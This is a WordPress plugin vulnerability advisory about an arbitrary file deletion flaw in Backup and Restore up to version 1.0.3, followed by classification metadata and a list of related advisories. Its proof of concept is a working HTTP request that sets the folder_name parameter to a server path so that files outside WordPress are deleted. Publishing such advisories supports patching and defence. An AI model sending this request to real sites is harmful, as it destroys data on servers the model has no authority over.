Backup and Restore <= 1.0.3 – Admin+ Arbitrary File Deletion | Plugin Vulnerabilities

Description

The plugin does not sanitise and validate the folder_name parameter when deleting a report, which could allow high privilege users to delete arbitrary files on the web server, including those outside of the WordPress folder

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 128
Connection: close
Cookie: [admin+]

action=barfw_backup_ajax_redirect&call_type=delete_backup&file_name=something.txt&folder_name=%2Fvar%2Fwww%2F&id=2&nonce=b3a6a41699

Affects Plugins

backup-and-restore-for-wp

No known fix

References

Exploitdb

Classification

Type

FILE DELETION

OWASP top 10

A6: Security Misconfiguration

CWE

CVSS

Miscellaneous

Original Researcher

Murat DEMIRCI

Submitter twitter

butterflyhunt3r

Verified

Yes

WPVDB ID

3c457ce0-8737-4a6a-9580-b00cd3dc2136

Timeline

Publicly Published

2021-11-08 (about 4 years ago)

Added

2021-11-08 (about 4 years ago)

Last Updated

2022-04-11 (about 4 years ago)

Other

Published

Title

Published

2022-11-29

Title

Simple:Press < 6.8.1 - Subscriber+ Arbitrary File Deletion

Published

2025-12-01

Title

Cost Calculator Builder < 3.6.4 - Unauthenticated Arbitrary File Deletion

Published

2021-04-13

Title

CM Download Manager < 2.8.0 - Authenticated Arbitrary File Deletion

Published

2024-12-20

Title

SMSA Shipping(official) < 2.4 - Authenticated (Subscriber+) Arbitrary File Deletion

Published

2025-12-05

Title

10Web Booster < 2.32.11 - Subscriber+ Arbitrary Folder Deletion